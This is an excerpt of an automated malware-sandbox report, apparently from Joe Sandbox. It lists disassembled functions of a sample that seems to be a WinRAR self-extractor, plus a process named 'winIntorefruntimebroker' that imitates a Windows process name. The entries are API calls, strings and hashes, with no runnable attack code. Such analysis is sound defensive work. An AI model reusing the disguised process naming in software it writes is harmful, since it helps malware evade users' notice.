                                        • CryptUnprotectMemory failed, xrefs: 002DF3CA
                                        • CryptProtectMemory failed, xrefs: 002DF389
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        • Opcode ID: e6f7fb5508175540b5d88b18e5fa3f6d9c0adcfc0dd12fc1becf1b2104245a01
                                        • Instruction ID: eaf1c0cdcd7212884474922fd6ec897929d971849ecc682e28cf0e47fe33a8d8
                                        • Opcode Fuzzy Hash: e6f7fb5508175540b5d88b18e5fa3f6d9c0adcfc0dd12fc1becf1b2104245a01
                                        • Instruction Fuzzy Hash: DD115C326112556BDF965F20DD496AE371CFF04760F064167FC425B391DA709E218B98
                                        Function 002E101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,00010000,002E1160,?,00000000,00000000), ref: 002E1043
                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 002E108A
                                          • Part of subcall function 002D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D6C54
                                          • Part of subcall function 002D6DCB: _wcschr.LIBVCRUNTIME ref: 002D6E0A
                                          • Part of subcall function 002D6DCB: _wcschr.LIBVCRUNTIME ref: 002D6E19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                        • String ID: CreateThread failed
                                        • API String ID: 2706921342-3849766595
                                        • Opcode ID: dc73bb08b81ff962bb68dee8710a7bfa079774e08a92a55146d25983082163d1
                                        • Instruction ID: c9fd2b8fe9075346eb5927d6271821caa0a1638203eab33c9116dd638b37f7eb
                                        • Opcode Fuzzy Hash: dc73bb08b81ff962bb68dee8710a7bfa079774e08a92a55146d25983082163d1
                                        • Instruction Fuzzy Hash: 85012BB5391349ABD3355F25EC55BF6735CEB44350F10003FFA8752280CAB06DA48624
                                        Function 002DC058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr
                                        • String ID: <90$?*<>|"
                                        • API String ID: 2691759472-290932987
                                        • Opcode ID: 5a0b692f4d558e1ac97a7514bf446ee0a2254f671ea7f70d46bac321b3188fa9
                                        • Instruction ID: 7f61f74737f5d7d5a3c9c8603763cb93aac6ba69b3f39c31f3af19fce747a93a
                                        • Opcode Fuzzy Hash: 5a0b692f4d558e1ac97a7514bf446ee0a2254f671ea7f70d46bac321b3188fa9
                                        • Instruction Fuzzy Hash: 5FF08657565703C5C7341E249811736B3E9EFA5731F38441FE5C5873C2EAA18CD0C695
                                        Function 002EDB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: Software\WinRAR SFX$.
                                        • API String ID: 176396367-1718270432
                                        • Opcode ID: bbee5de65c5aec7ab4a90218ce90ecc50e2777728c65d4d6583e460fd781726e
                                        • Instruction ID: 9fdb855ffd51cde0552f0b950daea6c52ca32a8da167a3e1cfad8f5fc50acd13
                                        • Opcode Fuzzy Hash: bbee5de65c5aec7ab4a90218ce90ecc50e2777728c65d4d6583e460fd781726e
                                        • Instruction Fuzzy Hash: 5601A731551158BAEF229F92DC49FDF7F7CEF09395F404056B509910A0DBB04B98CBA1
                                        Function 002EAE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002DC29A: _wcslen.LIBCMT ref: 002DC2A2
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E1FE5
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E1FF6
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E2006
                                          • Part of subcall function 002E1FDD: _wcslen.LIBCMT ref: 002E2014
                                          • Part of subcall function 002E1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,002DB371,?,?,00000000,?,?,?), ref: 002E202F
                                          • Part of subcall function 002EAC04: SetCurrentDirectoryW.KERNELBASE(?,002EAE72,C:\Users\user\Desktop,00000000,0031946A,00000006), ref: 002EAC08
                                        • _wcslen.LIBCMT ref: 002EAE8B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$CompareCurrentDirectoryString
                                        • String ID: <.$C:\Users\user\Desktop
                                        • API String ID: 521417927-3226724814
                                        • Opcode ID: cbde78f4e5d0cbdc8f7d5bdefa164850c7ef11cb88a896b97478b3c1c28c2b21
                                        • Instruction ID: 4d88f2804e4849ea061994aca6fc51fcef8f3ef8b6297357e1e386682d87a71c
                                        • Opcode Fuzzy Hash: cbde78f4e5d0cbdc8f7d5bdefa164850c7ef11cb88a896b97478b3c1c28c2b21
                                        • Instruction Fuzzy Hash: CD01B571D5025955DF11ABA6DD0AEDE73BCAF0C300F100426F501E3181EAB4A6A48EA1
                                        Function 002FBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002F97E5: GetLastError.KERNEL32(?,00311030,002F4674,00311030,?,?,002F3F73,00000050,?,00311030,00000200), ref: 002F97E9
                                          • Part of subcall function 002F97E5: _free.LIBCMT ref: 002F981C
                                          • Part of subcall function 002F97E5: SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F985D
                                          • Part of subcall function 002F97E5: _abort.LIBCMT ref: 002F9863
                                        • _abort.LIBCMT ref: 002FBB80
                                        • _free.LIBCMT ref: 002FBBB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLast_abort_free
                                        • String ID: p0
                                        • API String ID: 289325740-140255176
                                        • Opcode ID: b7a667816538f020b17a6482a31ddc6b524517cb55bbb843a993c6dbebf47c74
                                        • Instruction ID: a164e19a3c8fcefbf083b16604a4d68f8bbc4a9351612b8116d60543c23cbe1f
                                        • Opcode Fuzzy Hash: b7a667816538f020b17a6482a31ddc6b524517cb55bbb843a993c6dbebf47c74
                                        • Instruction Fuzzy Hash: 14012671D2162EDBCB23AF29C40163DF360BF04BA4B14052AEE6467281CB306C21CFC1
                                        Function 002EB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Malloc
                                        • String ID: (.$Z.
                                        • API String ID: 2696272793-4154499658
                                        • Opcode ID: cc9a47bd1030090aaded41c56c272f6f666c63f8822e18a67e3654d325545322
                                        • Instruction ID: 07bf0a9cd4e36ff81c2fc0408156546f7765d8faa6c2f74ebde347d7d266cd47
                                        • Opcode Fuzzy Hash: cc9a47bd1030090aaded41c56c272f6f666c63f8822e18a67e3654d325545322
                                        • Instruction Fuzzy Hash: 1E0186B6650108FF9F068FB0DC89CAEBBBCEF08341B004159B906D7120E630AA44DBA0
                                        Function 002F8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002FBF30: GetEnvironmentStringsW.KERNEL32 ref: 002FBF39
                                          • Part of subcall function 002FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002FBF5C
                                          • Part of subcall function 002FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002FBF82
                                          • Part of subcall function 002FBF30: _free.LIBCMT ref: 002FBF95
                                          • Part of subcall function 002FBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002FBFA4
                                        • _free.LIBCMT ref: 002F82AE
                                        • _free.LIBCMT ref: 002F82B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                        • String ID: 0"3
                                        • API String ID: 400815659-3276282804
                                        • Opcode ID: 921aa0e3eb5225a93e0832207f0499a98c8a5ade52de4d5c0b221a0095059918
                                        • Instruction ID: 2d770f3f2bdea560778b4a099abe2539e4a3bb1c71d168d052a9dd063194e269
                                        • Opcode Fuzzy Hash: 921aa0e3eb5225a93e0832207f0499a98c8a5ade52de4d5c0b221a0095059918
                                        • Instruction Fuzzy Hash: BCE0E53363698A41A7A236396C42A3BC6044F823F8F150636FF10C60C3CE5088220CA2
                                        Function 002E0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,002E1206,?), ref: 002E0FEA
                                        • GetLastError.KERNEL32(?), ref: 002E0FF6
                                          • Part of subcall function 002D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D6C54
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002E0FFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        • Opcode ID: 19bb3fa767e479924b865cba105c9c6d86a0afef146e2c4e8c8081f1f0bf6e8c
                                        • Instruction ID: 0d725ce75f81ac3dbb5d6c164b662335910726ebf7a9b2c1f54c4e1717235929
                                        • Opcode Fuzzy Hash: 19bb3fa767e479924b865cba105c9c6d86a0afef146e2c4e8c8081f1f0bf6e8c
                                        • Instruction Fuzzy Hash: B8D02B7155613076C61233249C1DEEE380C8B12331F540717F179502E1CA200EA14695
                                        Function 002DE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,002DDA55,?), ref: 002DE2A3
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,002DDA55,?), ref: 002DE2B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: ebf2f86b1fac68ee884c3f8088cc84b9e770193d657286650b6f673a40b291a0
                                        • Instruction ID: df2a1c769e68b2848c072515435f09fd58de70231bbd1dc1c6fd3d75dd323700
                                        • Opcode Fuzzy Hash: ebf2f86b1fac68ee884c3f8088cc84b9e770193d657286650b6f673a40b291a0
                                        • Instruction Fuzzy Hash: 13C0123124371167EA322B7A6C6DB836A5C9B00B11F0A044AB682EA2D1DAA5C98086A0
                                        Function 002EE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE467
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: p.$z.
                                        • API String ID: 1269201914-4095521071
                                        • Opcode ID: 057f82332320822b1765b653d0c48f18ff11af1094289b335e41b8cd7c7413f0
                                        • Instruction ID: 4f48d4bd5a285dc76a8d3b54d7b3b574421a81c7d36f364560836a004ee3456a
                                        • Opcode Fuzzy Hash: 057f82332320822b1765b653d0c48f18ff11af1094289b335e41b8cd7c7413f0
                                        • Instruction Fuzzy Hash: D6B012D62F90807DB50992161D12D3B010DC0C0F10771912EF405C00C1D9880E580C32
                                        Function 002EE455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE467
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: U.$p.
                                        • API String ID: 1269201914-1231522331
                                        • Opcode ID: d9f0d343499b7520501ea15b95668f0a945a2da74ad99b84683aa363c424bd07
                                        • Instruction ID: fcf1f93dcde77e858198e2d7922cc982684ed5cf7999d15f9b082771eee8aca5
                                        • Opcode Fuzzy Hash: d9f0d343499b7520501ea15b95668f0a945a2da74ad99b84683aa363c424bd07
                                        • Instruction Fuzzy Hash: 7CB012D62F90807DB50952121D12C3B020DC0C0F10771D12EF601C00D1D9850E990C32

                                        Executed Functions

                                        Function 00007FFD9B880D70 Relevance: .3, Instructions: 267COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c72dc314467cd092e335df4a9c0593473578b2279bf11fedc98c9b00bc9ae7e
                                        • Instruction ID: fe0e49fae04556c99fdcc4dbb722d7beb0fa7bec95025c7f0b508311069fb4ef
                                        • Opcode Fuzzy Hash: 9c72dc314467cd092e335df4a9c0593473578b2279bf11fedc98c9b00bc9ae7e
                                        • Instruction Fuzzy Hash: 6291B2B1A19A8D8FE7A8DBACC8657A97FE1FF99304F40017AD01AD72D6CB781811C740
                                        Function 00007FFD9B884DE8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: {
                                        • API String ID: 0-366298937
                                        • Opcode ID: 5b2e772e129fcd56336ca451ea46e1ac547ac0dbfa93c5dbe89ec6a3746ef9b4
                                        • Instruction ID: a3d3d805b3007047f1b9e07aff6940f6e1e9a7cd52b0f7b795a7a8e0a00130d0
                                        • Opcode Fuzzy Hash: 5b2e772e129fcd56336ca451ea46e1ac547ac0dbfa93c5dbe89ec6a3746ef9b4
                                        • Instruction Fuzzy Hash: 39112B70E059698FEB74EB58CC547A9B3B1EF88352F1042E6D41DE22A5DF342A818F40
                                        Function 00007FFD9B8808D0 Relevance: .2, Instructions: 181COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1301f89c1e1a073a7095297ab4add5863f58178b74c5bf475d7c226878eeb3d1
                                        • Instruction ID: 93499828980bd11e7b2ed7d4b4c7b79698f90134d6a9eac8701f314116fb7df3
                                        • Opcode Fuzzy Hash: 1301f89c1e1a073a7095297ab4add5863f58178b74c5bf475d7c226878eeb3d1
                                        • Instruction Fuzzy Hash: CC51B331A0896D8FDB58FFA8E4A5AEDBBA1FF48318F04017BD009D7196DE34A841C780
                                        Function 00007FFD9B880998 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce8d0e3206e154136a5f089a15e43557c2850635a34208510e8208906ebef2e7
                                        • Instruction ID: fe04a9144d5bc42fb78ea824b701e9658badeec682274d6597995e7bcf925954
                                        • Opcode Fuzzy Hash: ce8d0e3206e154136a5f089a15e43557c2850635a34208510e8208906ebef2e7
                                        • Instruction Fuzzy Hash: E1411B70A1891D9FDF94EF98C895AEDBBF1FF58305F40017AE419E32A5DB34A8418B80
                                        Function 00007FFD9B880C25 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d212671aa4a5f562f6f575d7c965fc91b952bd05ad284da5441e8343c987c82
                                        • Instruction ID: a3814c9ef32cfba66ecc6e06028816dbc6c51afd4e7ae9773fc4f4e97d4cb6cb
                                        • Opcode Fuzzy Hash: 0d212671aa4a5f562f6f575d7c965fc91b952bd05ad284da5441e8343c987c82
                                        • Instruction Fuzzy Hash: 25216D75B0EA9E4FE3229BA8CC212EC3B61EF86710F050573C164DB1E3C6382609C791
                                        Function 00007FFD9B885F11 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a33dacbf6b371f4a494a18602341b70820b1250ba847ef90f48b0adb694261a
                                        • Instruction ID: cccf5745e0c70c628723d81b9cbdd4600cb5cb213bc2c07aab4fd33e6a69986e
                                        • Opcode Fuzzy Hash: 0a33dacbf6b371f4a494a18602341b70820b1250ba847ef90f48b0adb694261a
                                        • Instruction Fuzzy Hash: 6B319770D1D92D8FEBB5DB55C8647E8B6B1FB18301F4140F9D41DA22A1CB786A84CF01
                                        Function 00007FFD9B880C38 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
